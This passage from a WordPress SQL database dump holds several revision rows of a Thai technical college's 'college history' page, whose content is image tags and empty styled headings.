initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"alignleft wp-image-3077 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:09:12', '2018-06-18 09:09:12', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3079, 3, '2018-06-18 16:11:16', '2018-06-18 09:11:16', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n \r\n<h3><img class=\"alignleft wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n \r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n<h3><img class=\"alignleft wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"165\" height=\"64\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"165\" height=\"62\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"160\" height=\"60\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"alignleft wp-image-3077 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:11:16', '2018-06-18 09:11:16', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3080, 3, '2018-06-18 16:12:14', '2018-06-18 09:12:14', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n \r\n<h3><img class=\"wp-image-1200 size-medium alignleft\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></h3>\r\n \r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></h3>\r\n<h3><img class=\"alignleft wp-image-1203 size-medium\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"alignleft wp-image-3077 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:12:14', '2018-06-18 09:12:14', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3081, 3, '2018-06-18 16:12:39', '2018-06-18 09:12:39', '<h3><img class=\"alignleft wp-image-947 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"838\" height=\"351\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n \r\n<h3><img class=\"wp-image-1200 size-medium alignleft\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></h3>\r\n \r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></h3>\r\n<h3><img class=\"alignleft wp-image-1203 size-medium\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"alignleft wp-image-3077 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:12:39', '2018-06-18 09:12:39', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3082, 3, '2018-06-18 16:14:31', '2018-06-18 09:14:31', '<h3><img class=\"alignleft wp-image-947 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"838\" height=\"351\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n<h3><img class=\"wp-image-1200 size-medium alignnone\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></h3>\r\n<h3><img class=\"wp-image-1203 size-medium alignnone\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></h3>\r\n<img class=\"wp-image-1202 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1201 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"alignleft wp-image-3077 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:14:31', '2018-06-18 09:14:31', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3083, 3, '2018-06-18 16:16:38', '2018-06-18 09:16:38', '<h3><img class=\"alignleft wp-image-947 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"838\" height=\"351\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; 